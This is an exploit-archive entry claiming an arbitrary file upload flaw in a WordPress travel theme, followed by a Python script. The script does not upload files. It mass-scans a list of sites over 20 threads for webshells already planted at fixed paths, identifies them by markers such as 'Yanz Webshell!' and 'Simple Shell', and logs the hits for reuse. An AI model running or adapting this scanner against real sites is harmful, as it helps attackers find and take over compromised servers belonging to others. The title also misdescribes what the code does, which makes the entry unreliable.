Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
Author: Milad karimi
type: webapps
platform: php
port:
date_added: 2024-04-08
date_updated: 2024-04-08
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51969.py
type: webapps
platform: php
port:
date_added: 2024-04-08
date_updated: 2024-04-08
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51969.py
# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload # Date: 2024-04-01 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys import os.path import requests import re import urllib3 from requests.exceptions import SSLError from multiprocessing.dummy import Pool as ThreadPool from colorama import Fore, init init(autoreset=True) error_color = Fore.RED info_color = Fore.CYAN success_color = Fore.GREEN highlight_color = Fore.MAGENTA requests.urllib3.disable_warnings() headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'Referer': 'www.google.com' } def URLdomain(url): if url.startswith("http://"): url = url.replace("http://", "") elif url.startswith("https://"): url = url.replace("https://", "") if '/' in url: url = url.split('/')[0] return url def check_security(url): fg = success_color fr = error_color try: url = 'http://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/travelscape/json.php', headers=headers, allow_redirects=True, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/travelscape/json.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/aahana/json.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/aahana/json.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) check = requests.get(url + '/wp-content/themes/travel/issue.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-content/themes/travel/issue.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/about.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/about.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/digital-download/new.php', headers=headers, allow_redirects=True, timeout=15) if '#0x2525' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('digital-download.txt', 'a').write(url + '/wp-content/themes/digital-download/new.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'http://' + URLdomain(url) check = requests.get(url + '/epinyins.php', headers=headers, allow_redirects=True, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/epinyins.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-admin/dropdown.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Simple Shell' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('dummyyummy.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) except Exception as e: print(f' -| {url} --> {fr}[Failed] due to: {e}') def main(): try: url_file_path = sys.argv[1] except IndexError: url_file_path = input(f"{info_color}Enter the path to the file containing URLs: ") if not os.path.isfile(url_file_path): print(f"{error_color}[ERROR] The specified file path is invalid.") sys.exit(1) try: urls_to_check = [line.strip() for line in open(url_file_path, 'r', encoding='utf-8').readlines()] except Exception as e: print(f"{error_color}[ERROR] An error occurred while reading the file: {e}") sys.exit(1) pool = ThreadPool(20) pool.map(check_security, urls_to_check) pool.close() pool.join() print(f"{info_color}Security check process completed successfully. Results are saved in corresponding files.") if __name__ == "__main__": main()
Copyright © 2024 Irfan TOOR all rights reserved.